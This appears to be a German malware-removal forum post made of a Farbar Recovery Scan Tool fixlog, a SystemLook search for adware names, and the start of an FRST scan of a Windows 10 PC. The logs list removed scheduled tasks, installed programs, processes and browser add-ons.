HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Tasks\{901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A839842C-D8D3-410F-A730-39BC24C4484E} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A839842C-D8D3-410F-A730-39BC24C4484E} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF7B870D-2508-4548-AF95-6776A6BBB9E1} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF7B870D-2508-4548-AF95-6776A6BBB9E1} => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => erfolgreich verschoben HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{522333AA-23D9-85D6-489B-224F78B46908} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\AutoKMS => erfolgreich verschoben HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => Schlüssel erfolgreich entfernt C:\Windows\AutoKMS => erfolgreich verschoben HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C571DD8E-3ED6-476A-BAAE-A345728189FD} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Tasks\{C571DD8E-3ED6-476A-BAAE-A345728189FD} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DE695851-C428-40A8-8661-95C82C81093C} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DE695851-C428-40A8-8661-95C82C81093C} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt ========= dir "%ProgramFiles%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Program Files 22.05.2017 18:25 <DIR> . 22.05.2017 18:25 <DIR> .. 
26.04.2015 13:26 <DIR> Adblock Plus for IE 17.05.2017 21:18 <DIR> AMD 07.05.2017 17:13 <DIR> ASUS 05.02.2017 21:17 <DIR> Bitdefender 23.05.2017 18:19 <DIR> Bitdefender Agent 26.04.2015 15:41 <DIR> Canon 22.05.2017 18:19 <DIR> Common Files 07.05.2017 17:14 <DIR> Intel 20.03.2017 06:41 <DIR> Internet Explorer 22.05.2017 18:25 <DIR> Malwarebytes 24.05.2015 12:10 <DIR> Microsoft Xbox 360 Accessories 07.05.2017 18:09 <DIR> MSBuild 07.05.2017 17:13 <DIR> Realtek 07.05.2017 18:09 <DIR> Reference Assemblies 24.05.2015 14:30 <DIR> Rockstar Games 05.02.2017 21:06 <DIR> Unlocker 03.05.2017 17:22 <DIR> UNP 05.02.2017 20:54 <DIR> VS Revo Group 20.03.2017 06:41 <DIR> Windows Defender 20.03.2017 06:43 <DIR> Windows Defender Advanced Threat Protection 07.05.2017 17:14 <DIR> Windows Mail 20.03.2017 06:41 <DIR> Windows Media Player 18.03.2017 23:03 <DIR> Windows Multimedia Platform 07.05.2017 17:20 <DIR> Windows NT 09.05.2017 23:04 <DIR> Windows Photo Viewer 18.03.2017 23:03 <DIR> Windows Portable Devices 18.03.2017 23:03 <DIR> Windows Security 18.03.2017 23:03 <DIR> WindowsPowerShell 24.05.2015 12:00 <DIR> WinRAR 0 Datei(en), 0 Bytes 31 Verzeichnis(se), 158.767.104.000 Bytes frei ========= Ende von CMD: ========= ========= dir "%ProgramFiles(x86)%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Program Files (x86) 22.05.2017 18:28 <DIR> . 22.05.2017 18:28 <DIR> .. 
30.09.2016 17:46 <DIR> AMD 25.04.2015 07:04 <DIR> AMD AVT 07.05.2017 17:14 <DIR> ASUS 26.12.2015 16:08 <DIR> Battle.net 26.04.2015 15:42 <DIR> Canon 07.05.2017 17:14 <DIR> Common Files 25.04.2015 07:59 <DIR> CrystalDiskInfo 22.01.2017 16:12 <DIR> Drakonia Configurator 15.08.2015 16:49 <DIR> Ghostery 05.02.2017 20:50 <DIR> Google 25.04.2015 07:20 <DIR> Intel 20.03.2017 06:41 <DIR> Internet Explorer 29.01.2017 17:53 <DIR> Lavalys 05.02.2017 17:59 <DIR> linker 25.02.2017 13:10 <DIR> McAfee 19.05.2017 14:20 <DIR> Microsoft.NET 08.05.2017 21:19 <DIR> MonitorDriver 22.05.2017 18:14 <DIR> Mozilla Firefox 22.05.2017 18:20 <DIR> Mozilla Maintenance Service 07.05.2017 18:09 <DIR> MSBuild 22.08.2015 16:59 <DIR> Origin 22.08.2015 16:57 <DIR> Origin Games 30.11.2016 18:54 <DIR> PDF24 05.02.2017 18:36 <DIR> Qeqotion 05.02.2017 17:58 <DIR> Raptr 16.08.2015 13:40 <DIR> Realtek 07.05.2017 18:09 <DIR> Reference Assemblies 24.05.2015 14:30 <DIR> Rockstar Games 24.02.2016 19:36 <DIR> Samsung 26.04.2015 14:27 <DIR> Skype 21.05.2017 20:55 <DIR> Spybot - Search & Destroy 2 21.05.2017 21:36 <DIR> Steam 26.04.2015 14:25 <DIR> TeamSpeak 3 Client 26.04.2015 13:39 <DIR> Ubisoft 24.05.2015 14:30 <DIR> VS Revo Group 01.05.2017 12:44 <DIR> VulkanRT 20.03.2017 06:41 <DIR> Windows Defender 07.05.2017 17:14 <DIR> Windows Mail 20.03.2017 06:41 <DIR> Windows Media Player 18.03.2017 23:03 <DIR> Windows Multimedia Platform 18.03.2017 23:03 <DIR> Windows NT 09.05.2017 23:04 <DIR> Windows Photo Viewer 18.03.2017 23:03 <DIR> Windows Portable Devices 18.03.2017 23:03 <DIR> WindowsPowerShell 19.02.2017 12:30 <DIR> WISO 0 Datei(en), 0 Bytes 47 Verzeichnis(se), 158.766.522.368 Bytes frei ========= Ende von CMD: ========= ========= dir "%ProgramData%" ========= Volume in Laufwerk C: hat keine Bezeichnung. 
Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\ProgramData 26.04.2015 15:01 <DIR> .mono 05.02.2017 19:40 46.145 agent.1486316443.bdinstall.bin 05.02.2017 20:08 26.583 agent.1486318128.bdinstall.bin 05.02.2017 20:09 26.510 agent.1486318150.bdinstall.bin 05.02.2017 20:52 46.366 agent.1486320772.bdinstall.bin 05.02.2017 20:55 28.837 agent.1486320909.bdinstall.bin 05.02.2017 20:57 46.212 agent.1486321078.bdinstall.bin 05.02.2017 21:01 26.790 agent.1486321314.bdinstall.bin 05.02.2017 21:02 28.833 agent.1486321377.bdinstall.bin 05.02.2017 21:11 46.370 agent.1486321901.bdinstall.bin 09.02.2017 19:09 28.754 agent.1486660167.bdinstall.bin 08.03.2017 21:56 29.970 agent.update.1489002971.bdinstall.bin 01.05.2017 12:45 <DIR> AMD 25.04.2015 07:21 <DIR> ASUS 05.01.2016 19:09 <DIR> ATI 05.02.2017 17:58 <DIR> Avg 26.04.2015 13:35 <DIR> Battle.net 05.02.2017 19:52 <DIR> BDLogging 05.02.2017 20:28 <DIR> Bitdefender 05.02.2017 21:11 <DIR> Bitdefender Agent 05.02.2017 21:17 <DIR> Bitdefender Device Management 26.04.2015 13:38 <DIR> Blizzard Entertainment 12.02.2017 16:02 <DIR> Buhl Data Service GmbH 26.04.2015 15:42 <DIR> Canon IJ Network Tool 26.04.2015 15:41 <DIR> CanonIJWSpt 05.02.2017 21:15 381.546 cl.1486322005.bdinstall.bin 16.07.2016 13:47 <DIR> Comms 03.10.2016 18:50 <DIR> dbdata 05.02.2017 21:17 55.877 dm.1486322271.bdinstall.bin 07.02.2017 23:33 35.238 dm.1486503192.bdinstall.bin 22.08.2015 17:13 <DIR> Electronic Arts 29.03.2017 15:57 <DIR> elsterformular 25.04.2015 07:16 <DIR> Intel 22.05.2017 18:25 <DIR> Malwarebytes 09.02.2017 23:13 <DIR> McAfee 19.05.2017 14:20 <DIR> Microsoft Help 07.05.2017 21:26 <DIR> Microsoft OneDrive 25.04.2015 06:53 <DIR> Microsoft Toolkit 23.08.2015 17:45 <DIR> Origin 01.05.2017 12:17 <DIR> Package Cache 05.02.2017 21:11 <DIR> Panda Security 19.05.2017 14:20 <DIR> regid.1991-06.com.microsoft 24.02.2016 19:36 <DIR> Samsung 26.04.2015 14:27 <DIR> Skype 24.05.2015 13:01 <DIR> Socialclub 18.03.2017 23:03 <DIR> SoftwareDistribution 25.07.2015 12:29 
<DIR> Solidshield 21.05.2017 20:54 <DIR> Spybot - Search & Destroy 24.05.2015 13:01 <DIR> Steam 07.05.2017 17:17 <DIR> USOPrivate 07.05.2017 17:17 <DIR> USOShared 20.03.2017 06:43 <DIR> WindowsHolographicDevices 01.03.2017 19:50 <DIR> {CA67D69C-7DCC-6137-7CD8-F928B38095A6} 14 Datei(en), 854.031 Bytes 39 Verzeichnis(se), 158.766.460.928 Bytes frei ========= Ende von CMD: ========= ========= dir "%Appdata%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Users\Dino\AppData\Roaming 23.05.2017 18:23 <DIR> . 23.05.2017 18:23 <DIR> .. 26.04.2015 15:01 <DIR> .mono 25.04.2015 06:35 <DIR> Adobe 26.04.2015 13:35 <DIR> AMD 25.04.2015 06:55 <DIR> ATI 26.04.2015 13:36 <DIR> Battle.net 05.02.2017 20:03 <DIR> Bitdefender 13.02.2016 12:34 <DIR> Buhl Data Service 02.11.2015 19:52 <DIR> Canon 22.01.2017 16:23 <DIR> discord 24.02.2017 12:45 <DIR> EasyAntiCheat 21.02.2016 17:08 <DIR> elsterformular 25.04.2015 07:16 <DIR> InstallShield 25.07.2015 10:49 <DIR> library_dir 25.04.2015 06:47 <DIR> Macromedia 22.01.2017 16:12 <DIR> MingGuan 15.08.2015 16:53 <DIR> Mozilla 22.08.2015 16:16 <DIR> Origin 05.02.2017 19:51 <DIR> QuickScan 29.12.2015 18:13 <DIR> Raptr 31.08.2015 18:08 <DIR> Samsung 02.09.2016 18:13 <DIR> Skype 19.02.2017 12:51 <DIR> Spotify 26.04.2015 15:01 <DIR> Steam 29.03.2017 15:50 <DIR> TeamViewer 26.04.2015 14:52 <DIR> TS3Client 25.07.2015 13:25 <DIR> Ubisoft 24.05.2015 12:00 <DIR> WinRAR 0 Datei(en), 0 Bytes 29 Verzeichnis(se), 158.766.403.584 Bytes frei ========= Ende von CMD: ========= ========= dir "%LocalAppdata%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Users\Dino\AppData\Local 23.05.2017 17:47 <DIR> . 23.05.2017 17:47 <DIR> .. 
18.01.2016 18:14 <DIR> ActiveSync 19.02.2017 12:20 <DIR> Adobe 07.11.2016 18:25 <DIR> AMD 25.04.2015 06:55 <DIR> ATI 26.12.2015 16:18 <DIR> Battle.net 26.04.2015 13:35 <DIR> Blizzard Entertainment 12.02.2017 16:01 <DIR> Buhl 13.02.2016 12:34 <DIR> Buhl Data Service 17.09.2015 11:20 <DIR> CEF 26.04.2015 15:01 <DIR> Colossal Order 16.08.2015 13:53 <DIR> Comms 03.10.2016 12:54 <DIR> ConnectedDevicesPlatform 07.05.2017 21:24 <DIR> DBG 22.01.2017 15:26 <DIR> Discord 28.01.2017 16:51 <DIR> ElevatedDiagnostics 15.08.2015 16:49 <DIR> GhosteryConfig 22.11.2015 12:23 <DIR> Google 11.07.2015 10:40 <DIR> GWX 22.04.2017 19:40 <DIR> JDownloader v2.0 18.09.2015 12:19 <DIR> Macromedia 07.05.2017 17:17 <DIR> Microsoft 25.04.2015 17:25 <DIR> Microsoft Help 21.08.2015 17:13 <DIR> MicrosoftEdge 16.08.2015 01:05 <DIR> Mozilla 22.08.2015 14:38 <DIR> Origin 09.05.2017 21:32 <DIR> Packages 02.11.2015 19:58 <DIR> PDF24 22.08.2015 13:46 <DIR> PeerDistRepub 22.05.2017 18:28 <DIR> Programs 16.08.2015 13:45 <DIR> Publishers 27.01.2017 23:52 7.601 Resmon.ResmonCfg 24.05.2015 12:51 <DIR> Rockstar Games 26.04.2015 14:27 <DIR> Skype 19.02.2017 13:23 <DIR> Spotify 22.01.2017 15:26 <DIR> SquirrelTemp 16.08.2015 13:49 <DIR> Stardock 01.05.2017 10:53 <DIR> Steam 23.05.2017 18:22 <DIR> Temp 16.08.2015 13:45 <DIR> TileDataLayer 24.02.2017 12:54 <DIR> Ubisoft Game Launcher 03.05.2017 17:47 <DIR> UNP 25.04.2015 06:35 <DIR> VirtualStore 1 Datei(en), 7.601 Bytes 43 Verzeichnis(se), 158.766.346.240 Bytes frei ========= Ende von CMD: ========= ========= dir "%CommonProgramFiles(x86)%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Program Files (x86)\Common Files 07.05.2017 17:14 <DIR> . 07.05.2017 17:14 <DIR> .. 
25.04.2015 07:04 <DIR> ATI Technologies 26.04.2015 13:38 <DIR> Blizzard Entertainment 25.04.2015 07:20 <DIR> InstallShield 19.05.2017 14:20 <DIR> Microsoft Shared 25.04.2015 07:16 <DIR> postureAgent 18.03.2017 23:03 <DIR> Services 05.02.2017 20:51 <DIR> Skype 01.05.2017 12:40 <DIR> Steam 20.03.2017 06:41 <DIR> System 0 Datei(en), 0 Bytes 11 Verzeichnis(se), 158.766.292.992 Bytes frei ========= Ende von CMD: ========= ========= dir "%CommonProgramW6432%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Program Files\Common Files 22.05.2017 18:19 <DIR> . 22.05.2017 18:19 <DIR> .. 07.05.2017 17:13 <DIR> ATI Technologies 05.02.2017 19:52 <DIR> Bitdefender 09.02.2017 19:08 <DIR> Intel 19.05.2017 14:20 <DIR> microsoft shared 18.03.2017 23:03 <DIR> Services 19.05.2017 14:20 <DIR> System 0 Datei(en), 0 Bytes 8 Verzeichnis(se), 158.766.235.648 Bytes frei ========= Ende von CMD: ========= ========= dir "%UserProfile%" ========= Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: B0DD-0F8A Verzeichnis von C:\Users\Dino 14.05.2017 22:59 <DIR> . 14.05.2017 22:59 <DIR> .. 
10.05.2017 21:47 <DIR> Contacts 23.05.2017 18:23 <DIR> Desktop 07.05.2017 21:24 <DIR> Documents 07.05.2017 21:24 <DIR> Downloads 10.05.2017 21:47 <DIR> Favorites 10.05.2017 21:47 <DIR> Links 07.05.2017 21:24 <DIR> Music 23.05.2017 18:23 <DIR> OneDrive 07.05.2017 21:24 <DIR> Pictures 10.05.2017 21:47 <DIR> Saved Games 10.05.2017 21:47 <DIR> Searches 26.04.2015 14:32 <DIR> Tracing 07.05.2017 21:24 <DIR> Videos 0 Datei(en), 0 Bytes 15 Verzeichnis(se), 158.766.174.208 Bytes frei ========= Ende von CMD: ========= ========= RemoveProxy: ========= HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt ========= Ende von RemoveProxy: ========= ========= ipconfig /flushdns ========= Windows-IP-Konfiguration Der DNS-Aufl”sungscache wurde geleert. ========= Ende von CMD: ========= ========= netsh winsock reset ========= Der Winsock-Katalog wurde zurckgesetzt. Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen. ========= Ende von CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 6578176 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23722052 B Java, Flash, Steam htmlcache => 9458 B Windows/system/drivers => 13712566 B Edge => 7492150 B Chrome => 325000 B Firefox => 17232432 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 6656 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 128 B systemprofile32 => 128 B LocalService => 22794 B NetworkService => 125238 B Dino => 44261836 B RecycleBin => 277578 B EmptyTemp: => 108.5 MB temporäre Dateien entfernt. ================================ Das System musste neu gestartet werden. ==== Ende von Fixlog 18:24:09 ==== Code:
ATTFilter SystemLook 30.07.11 by jpshortstuff Log created at 18:27 on 23/05/2017 by Dino Administrator - Elevation successful ========== folderfind ========== Searching for "*Note-up*" No folders found. Searching for "*Kuaizip*" No folders found. Searching for "*Microleaves*" No folders found. Searching for "*Noobzo*" No folders found. Searching for "*SearchModule*" No folders found. Searching for "*DPower*" No folders found. Searching for "*BestCleaner*" No folders found. Searching for "*Spark*" No folders found. Searching for "*youndoo.com*" No folders found. ========== regfind ========== Searching for "Note-up" No data found. Searching for "Kuaizip" No data found. Searching for "Microleaves" No data found. Searching for "Noobzo" No data found. Searching for "SearchModule" No data found. Searching for "DPower" No data found. Searching for "BestCleaner" No data found. Searching for "Spark" No data found. Searching for "youndoo.com" No data found. -= EOF =- Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 22-05-2017 durchgeführt von Dino (Administrator) auf **** (23-05-2017 18:33:28) Gestartet von C:\Users\Dino\Desktop Geladene Profile: Dino (Verfügbare Profile: Dino) Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe (AMD) C:\Windows\System32\atiesrxx.exe (AMD) C:\Windows\System32\atieclxx.exe () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe () C:\Windows\SysWOW64\ASGT.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe (Advanced Micro Devices, Inc.) 
C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe (ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe () C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe (Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe (Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe (CANON INC.) 
C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe () C:\Program Files (x86)\Drakonia Configurator\hid.exe () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor) HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation) HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes) HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.) 
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH) HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] () HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd) HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung) HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\Parameters: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 8.8.8.8 Tcpip\..\Interfaces\{0784e829-3340-11e7-867e-806e6f6e6963}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 8.8.8.8 Tcpip\..\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 8.8.8.8 Tcpip\..\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}: [NameServer] 8.8.8.8 
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/ BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender) BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.) BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.) BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH) BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender) BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.) BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.) BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for 